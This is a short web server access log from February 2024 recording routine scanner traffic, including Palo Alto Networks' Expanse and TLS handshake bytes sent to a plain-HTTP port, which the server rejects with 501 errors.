162.216.150.106 - - [02/Feb/2024:06:23:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
193.118.51.138 - - [02/Feb/2024:06:23:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
45.142.182.85 - - [02/Feb/2024:06:23:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
45.79.181.223 - - [02/Feb/2024:06:24:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
178.79.129.102 - - [02/Feb/2024:06:35:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
178.79.129.102 - - [02/Feb/2024:06:35:30 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.79.129.102 - - [02/Feb/2024:06:35:30 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.79.129.102 - - [02/Feb/2024:06:35:30 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.79.129.102 - - [02/Feb/2024:06:36:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
178.79.129.102 - - [02/Feb/2024:06:36:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.79.129.102 - - [02/Feb/2024:06:36:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.79.129.102 - - [02/Feb/2024:06:36:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
213.219.36.125 - - [02/Feb/2024:06:37:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
213.219.36.125 - - [02/Feb/2024:06:37:20 +0100] "\x16\x03\x01" 501 318 "-" "-"
213.219.36.125 - - [02/Feb/2024:06:37:20 +0100] "\x16\x03\x01" 501 318 "-" "-"
213.219.36.125 - - [02/Feb/2024:06:37:20 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.36 - - [02/Feb/2024:06:38:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.36 - - [02/Feb/2024:06:38:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
176.58.124.80 - - [02/Feb/2024:06:52:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
176.58.124.80 - - [02/Feb/2024:06:52:52 +0100] "\x16\x03\x01" 501 318 "-" "-"
176.58.124.80 - - [02/Feb/2024:06:52:52 +0100] "\x16\x03\x01" 501 318 "-" "-"
176.58.124.80 - - [02/Feb/2024:06:52:52 +0100] "\x16\x03\x01" 501 318 "-" "-"
